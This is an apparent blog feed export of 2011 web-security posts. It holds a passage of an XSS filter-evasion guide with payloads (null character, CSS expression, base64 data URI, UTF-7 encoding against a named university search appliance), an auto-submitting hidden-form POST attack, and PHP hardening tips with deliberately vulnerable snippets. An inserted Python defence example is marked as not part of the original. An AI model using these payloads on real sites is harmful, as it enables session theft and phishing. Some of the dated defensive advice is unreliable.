&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Using Null character&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;Another character that can cause problems for filters is the null character. This is one of the most obscure and powerful tools in any XSS arsenal.  Take this example URL that can lead to a valid injection:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;SCRIPT&amp;gt;alert("XSS")&amp;lt;/SCRIPT&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
The null character () stops the filters from recognizing the &amp;lt;SCRIPT&amp;gt; tag. This only works in IE 6.0, IE 7.0, and Netscape 8.0 in IE rendering engine mode.    &lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Not filtering inside encapsulating pairs&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;This bypasses filtering that looks for opening and closing pairs of encapsulation inside HTML tags and ignores the contents. Example: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG """&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS')&amp;lt;/SCRIPT&amp;gt;"&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Technically, inside the IMG tag, the first two quotes should be considered encapsulation and should do nothing. The next quote should open encapsulation that runs to the next quote, which is after the &amp;lt;/SCRIPT&amp;gt; tag. Lastly, it should be closed by the trailing end angle bracket. But all major browsers, such as IE, Firefox, Netscape, or Opera, take this as malformed HTML and attempt to fix it. The output then looks like:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;img&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;"&amp;amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;CSS Filter Evasion&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;HTML is a useful tool for injecting JavaScript, but not the only tool an  even more complex sub-class of HTML is the style sheet or CSS. There  are many different ways to inject XSS into style sheets, and even more  ways to use them to inject JavaScript. . The simplest way to inject JavaScript into a CSS link tag is using the  JavaScript directive.  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;LINK REL="stylesheet" HREF="nojavascript...alert('XSS');"&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
However, IE has deprecated this as of 7.0, and it no longer works there; you can still get it working in Opera and for users who may still have IE 6.0 installed. Another way is to use the &amp;lt;STYLE&amp;gt; tag. It is rare that users have access to modify styles, but it does happen. This is more common in forums where users have access to the layout and design of their posts. The following will work in IE and Netscape in the IE rendering engine mode: &lt;code&gt;&amp;lt;STYLE&amp;gt; a { width: expression(alert('XSS')) } &amp;lt;/STYLE&amp;gt; &amp;lt;A&amp;gt;&lt;/code&gt; Using the above as an example, you can see how the expression tag allows the attacker to inject JavaScript without using the JavaScript directive or the &amp;lt;SCRIPT&amp;gt; tag.  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;DIV STYLE="width: expression(alert('XSS'));"&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Obscure Filters&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;Let's take an example where a developer has taken user input and insured  that it contains no quotes, no angle brackets, and no JavaScript  directives. Still, it is not safe, as we can inject something called a data  directive in this case, we have base64 encoded the simple string  &amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
The data directive allows us to inject entire documents inside a single string. The data directive works inside Firefox, Netscape in Gecko rendering engine mode, and Opera.    &lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Using Double Quotes&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;If you need to use both double and single quotes you can use a grave  accent to encapsulate the JavaScript string - this is also useful  because lots of cross site scripting filters don't know about grave  accents.  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC=`nojavascript...alert("Look its, 'XSS'")`&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Escaping characters&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;Escaping quotes is sometimes usefull when there is an own written  protection against XSS. This will allow you to escape the escape  characters used by the XSS filter script.&lt;br /&gt;
It's worth mentioning that this will ONLY work if it's an own written (weak) defending script.  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC=`nojavascript...alert(\"XSS\")`&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
The result would be:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC=`nojavascript...alert(\\"XSS\\")`&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
As you can see, your own escape characters now cancel out the escape characters added by the XSS protection.   &lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Encoding&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;It is often assumed that if all angle brackets and quotes have been filtered, XSS is no longer possible. However, XSS is reliant upon the browser, so as long as the browser can understand other encoding methods, you can run into situations where a browser will run commands without any of those characters.&lt;br /&gt;
A real world example of an XSS encoded vulnerability was found in  Google search appliance by a hacker named Maluc. Maluc found that a  normal Google search appliance query looked like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;http://ask.stanford.edu/search?output=xml_no_dtd&amp;amp;client=stanford&amp;amp;proxystylesheet=stanford&amp;amp;site=stanfordit&amp;amp;oe=UTF-8&amp;amp;q=hi&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
He noticed that, according to this string (oe=UTF-8), he could change the UTF code. He changed the UTF string from UTF-8 to UTF-7. &lt;br /&gt;
&lt;b&gt;UTF-7 (7-bit Unicode Transformation Format)&lt;/b&gt; is a  variable-length character encoding that was proposed for representing  Unicode-encoded text using a stream of ASCII characters, for example for  use in Internet e-mail messages. UTF-7 is generally not used as a  native representation within applications as it is very awkward to  process despite its size advantage over the combination of UTF-8 with  either quoted-printable or base64.&lt;br /&gt;
Let's take for example:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;script&amp;gt;alert("XSS")&amp;lt;/script&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
And encode it using UTF-7:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Now every + has to be changed to its URL code in a GET string for this to work. The URL code for + is %2B, so now we have:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
URL encoding turns a string into a safe block of text for appending to the query string of a URL. To encode a character for a URL, you use a percent sign followed by the two-digit hex number representing that character.&lt;br /&gt;
For example:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td&gt; Original character &lt;/td&gt; &lt;td&gt;  URL-encoded form &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;  space  &lt;/td&gt;  &lt;td&gt;     %20     &lt;/td&gt;     &lt;/tr&gt;
&lt;tr&gt;     &lt;td&gt; / (forward slash) &lt;/td&gt; &lt;td&gt;  %2F  &lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;  &lt;td&gt;  " (double quote)  &lt;/td&gt;  &lt;td&gt;   %22   &lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;   &lt;td&gt; ? (question mark) &lt;/td&gt; &lt;td&gt;  %3F &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;  +  &lt;/td&gt;  &lt;td&gt;     %2B     &lt;/td&gt;     &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
With this Maluc came up with:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;http://ask.stanford.edu/search?output=xml_no_dtd&amp;amp;client=stanford&amp;amp;proxystylesheet=stanford&amp;amp;site=stanfordit&amp;amp;oe=UTF-7&amp;amp;q=%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-x&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
And was able to successfully execute an XSS script.&lt;br /&gt;
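The oe=UTF-7 case above, as an added example that is not part of the original post (Python; the filter, the allowlist and all function names are assumptions for illustration): the reflected value passes a filter for angle brackets and quotes, turns into markup once it is read as UTF-7, and stays inert when the server pins the response charset from an allowlist instead of echoing the requested one.

```python
"""Added example: why filtering angle brackets and quotes fails when the
client controls the output charset (the oe=UTF-7 case described above)."""
import html

# Characters the assumed filter blocks:
# left angle bracket, right angle bracket, double quote, single quote.
BLOCKED = {chr(0x3C), chr(0x3E), '"', "'"}

# Output encodings this hypothetical search front end agrees to emit.
ALLOWED_OUTPUT_CHARSETS = {"utf-8", "iso-8859-1"}
DEFAULT_CHARSET = "utf-8"

# Constructed sample: the q value from the URL above after URL-decoding
# (%2B becomes +, %28 and %29 become the parentheses).
SAMPLE_Q = b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-"


def naive_filter_passes(raw: bytes) -> bool:
    """True when the raw bytes contain none of the blocked characters."""
    text = raw.decode("ascii", errors="replace")
    return not any(ch in BLOCKED for ch in text)


def as_browser_sees(raw: bytes, charset: str) -> str:
    """Decode the reflected bytes the way a client would for this charset."""
    return raw.decode(charset, errors="replace")


def pick_output_charset(requested: str) -> str:
    """Allowlist the client-supplied oe value; never echo it blindly."""
    candidate = requested.strip().lower()
    if candidate in ALLOWED_OUTPUT_CHARSETS:
        return candidate
    return DEFAULT_CHARSET


def render_results(raw_q: bytes, requested_oe: str) -> tuple:
    """Return (Content-Type header value, body) for a reflected search term.

    The term is decoded with the pinned charset, HTML-encoded, and the same
    charset is declared explicitly so the client has nothing to guess.
    """
    charset = pick_output_charset(requested_oe)
    term = raw_q.decode(charset, errors="replace")
    body = "You searched for: " + html.escape(term, quote=True)
    return "text/html; charset=" + charset, body


if __name__ == "__main__":
    print("filter passes:", naive_filter_passes(SAMPLE_Q))
    print("read as UTF-7:", as_browser_sees(SAMPLE_Q, "utf-7"))
    print("read as UTF-8:", as_browser_sees(SAMPLE_Q, "utf-8"))
    print("hardened     :", render_results(SAMPLE_Q, "UTF-7"))
```
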
Of course the effect of the XSS is only temporary and only affects users who go to that URL, but this could easily provide an avenue for phishing. In this way, the Google appliance has hurt Stanford University's security by being placed on the same domain.&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=_kl5yiGy_eE:jGWooH8CDNE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=_kl5yiGy_eE:jGWooH8CDNE:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=_kl5yiGy_eE:jGWooH8CDNE:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=_kl5yiGy_eE:jGWooH8CDNE:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=_kl5yiGy_eE:jGWooH8CDNE:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/7358045905646302737/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/complete-guide-to-xss.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7358045905646302737?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7358045905646302737?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/complete-guide-to-xss.html" title="The Complete Guide to XSS" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEQNRnkzeyp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-9212104212824298117</id><published>2011-09-10T23:09:00.002+05:30</published><updated>2011-09-10T23:09:57.783+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:09:57.783+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web security" /><title>XSS and post method</title><content type="html">XSS and post methods When a webpage uses the GET method  to submit user inputs through a  form, XSS is easily executed, by constructing a url for example like &lt;a href="http://www.xssvulnsite.com/index.asp?q=" target="_blank" title="autolink"&gt;http://www.xssvulnsite.com/index.asp?q=&lt;/a&gt;"&amp;gt;alert("XSS").  
But when a webpage uses the POST method, it is not possible to craft such a URL and use it as a link, because the page doesn't use the URL to send the user inputs to the form. It is still possible, however, to exploit an XSS vulnerability. So let's suppose once more a vulnerable site &lt;a href="http://www.xssvulnsite.com/" target="_blank" title="autolink"&gt;http://www.xssvulnsite.com/&lt;/a&gt; that uses a form to search or submit data. A very brief outline of the HTML code: &lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&amp;lt;form action="/search.asp" method="post" name="formX"&amp;gt; &amp;lt;input name="search_keyword" type="text" value="" /&amp;gt; &amp;lt;input type="submit" value="submit" /&amp;gt; &amp;lt;/form&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;To exploit the XSS vulnerability we can use an indirect way. Another file is written and hosted on another page, let's say the file hack.html at &lt;a href="http://www.redirectingpage.com/hack.html" target="_blank" title="autolink"&gt;http://www.redirectingpage.com/hack.html&lt;/a&gt;. What are its contents? The following code is written in the hack.html file: &lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&amp;lt;form action="http://www.xssvulnsite.com/search.asp" method="post" name="formX"&amp;gt; &amp;lt;input name="search_keyword" type="hidden" value="&amp;gt;&amp;lt;img src="http://www.offensivephotos/offensivephoto.jpg"&amp;gt;" /&amp;gt; &amp;lt;/form&amp;gt; setTimeout(formX.submit(),1);&lt;/code&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;We can see that the redirecting page's form reuses the parameters of the original form: it is a hidden form whose value holds whatever we want to place in the XSS hole, such as a script, a photo, or text. It is followed by a script that, when the intermediate page opens, loads the XSSed vulnerable page after 1 msec.&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=vqMPsBlKnR4:uUj91zr3pco:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=vqMPsBlKnR4:uUj91zr3pco:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=vqMPsBlKnR4:uUj91zr3pco:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=vqMPsBlKnR4:uUj91zr3pco:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=vqMPsBlKnR4:uUj91zr3pco:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/9212104212824298117/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/xss-and-post-method.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/9212104212824298117?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/9212104212824298117?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/xss-and-post-method.html" title="XSS and post method" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEUFRH46fip7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-6330847629404940258</id><published>2011-09-10T23:06:00.002+05:30</published><updated>2011-09-10T23:06:55.016+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:06:55.016+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web security" /><title>Saving the World, One Vulnerability at a Time</title><content type="html">x00 - Intro&lt;br /&gt;
Hey there, I was going to make a video going over this information, but when I got around to it, it seemed like a boring subject to watch. Anyway, I wanted to go over a few different techniques to help prevent some of the more common web vulnerabilities that are seen, such as: Cross-Site Scripting, Full Path Disclosure, Local/Remote File Inclusion, SQL Injection, Cross-Site Request Forgery. Each of the techniques I plan to cover is geared towards securing PHP source code, so if you code in Perl, ColdFusion, ASP, or some other web language this probably isn't going to help much.&lt;br /&gt;
&lt;br /&gt;
0x01 - Cross-Site Scripting (XSS)&lt;br /&gt;
Hopefully you already know about XSS and how the attacks work. As of PHP version 4.x.x there was a feature called "magic_quotes_gpc". Although magic_quotes was actually made to prevent SQL vulnerabilities, it also helps with XSS, because it adds a slash (\) any time a quotation mark (") is present in the GET, POST, or COOKIE fields, hence the "gpc". Although magic_quotes is a nice feature to have, as of PHP version 5.3.0 it is considered deprecated, and as of 6.0.0 it is removed completely, so as web developers we need a new method of adding slashes. We can do this with a function called, you guessed it, addslashes(). With these features, if an attacker used alert("test"); the output generated would be alert(\"test\"); though this is easy to get around with the JavaScript function fromCharCode(). One possibility to help with this vulnerability is regular expressions, such as preg_match or preg_replace. Another simple form of XSS comes into play when developers use the PHP_SELF variable, which is vulnerable by default. Developers could make a script such as&lt;br /&gt;
&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp;echo(\"You have viewing: \" . $_SERVER['PHP_SELF']);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
and the attacker would simply append "/" onto the end of the URL, for example:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://site/index.php/alert%28" target="_blank" title="autolink"&gt;http://site/index.php/alert(&lt;/a&gt;"test");&lt;br /&gt;
&lt;br /&gt;
A solution to this problem is a function called basename(). basename() returns whatever text is placed after the final forward slash (/), which in our attacker's case would be "script&amp;gt;", so even though our script is still not functioning properly, it is no longer vulnerable to the attack. Another important function to keep in mind is htmlspecialchars(); this function converts characters into their HTML entities, for instance &amp;lt; becomes &amp;amp;lt;&lt;br /&gt;
&lt;br /&gt;
0x02 - Full Path Disclosure (FPD)&lt;br /&gt;
Full path disclosures happen when error reporting is enabled for web applications, and there is actually a pretty easy fix for it. In the php.ini file there is an option for "display_errors", which as of PHP 5.2.4 has three possibilities: on, off, stderr. STDERR displays errors for applications other than web, so stderr and off are both safe. Another way to set this option is the PHP function ini_set(), which could look like ini_set("display_errors",0).&lt;br /&gt;
&lt;br /&gt;
0x03 - Remote File Inclusion (RFI)&lt;br /&gt;
In order to fix the RFI vulnerability you can simply turn off the  allow_url_include option in the php.ini file much like we did with the  FPD. Although once the allow_url_include is off LFI comes into play and  needs to be avoided.&lt;br /&gt;
&lt;br /&gt;
0x04 - Local File Inclusion (LFI)&lt;br /&gt;
Local file inclusion vulnerabilities can be performed with functions such as but not limited to:&lt;br /&gt;
include()&lt;br /&gt;
include_once()&lt;br /&gt;
require()&lt;br /&gt;
require_once()&lt;br /&gt;
virtual()&lt;br /&gt;
readfile()&lt;br /&gt;
fread()&lt;br /&gt;
fgets()&lt;br /&gt;
file_get_contents()&lt;br /&gt;
highlight_file()&lt;br /&gt;
&lt;br /&gt;
There are a few simple techniques to patch an LFI vulnerability: setting open_basedir, either at runtime with ini_set() or in the php.ini or httpd.conf files, or using a switch statement or if/elseif statement. open_basedir is not completely safe, though. With this method, the script is restricted to the given path when it uses other files, but if the path is set incorrectly an attacker may still be able to perform the LFI attack on our files. There are a few somewhat complex ways of bypassing SAFE_MODE/open_basedir, although by the time an attacker can attempt these it will already be too late for you, because they are on the inside already. Example: let's say that as the developer we set open_basedir to only allow access to our website's root folder "/home/oursite/www/public_html/". This will restrict an attacker so they will not be able to inject PHP code into our access/error log files or use /proc/self/environ and include a shell from our script; it will also restrict the attacker from viewing any other sites hosted on the server, if any are present. This does not, however, protect the files within our website, such as a config.php, which could include our SQL server information.&lt;br /&gt;
&lt;br /&gt;
Vulnerable code could look like:&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp;inlcude(\"./\" . $_GET['file']);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
It can easily be fixed:&lt;br /&gt;
&lt;br /&gt;
open_basedir:&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp;// open_basedir restricts the php script from accessing file and directories outside of the given scope&lt;br /&gt;
&amp;nbsp; &amp;nbsp;ini_set(\"open_basedir\", \"/home/oursite/www/public_html/\");&lt;br /&gt;
&amp;nbsp; &amp;nbsp;include(\"./\" . $_GET['file']);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
Switch:&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp;switch($_GET['file'])&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;case \"index.php\":&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;include(\"./index.php\");&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;break;&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
if/elseif:&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp;$file = $_GET['file'];&lt;br /&gt;
&amp;nbsp; &amp;nbsp;if($file == \"index.php\")&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;include(\"./index.php\");&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
&amp;nbsp; &amp;nbsp;elseif($file == \"users.php\")&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;include(\"./users.php\");&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
&amp;nbsp; &amp;nbsp;else&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;include(\"error.php\");&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
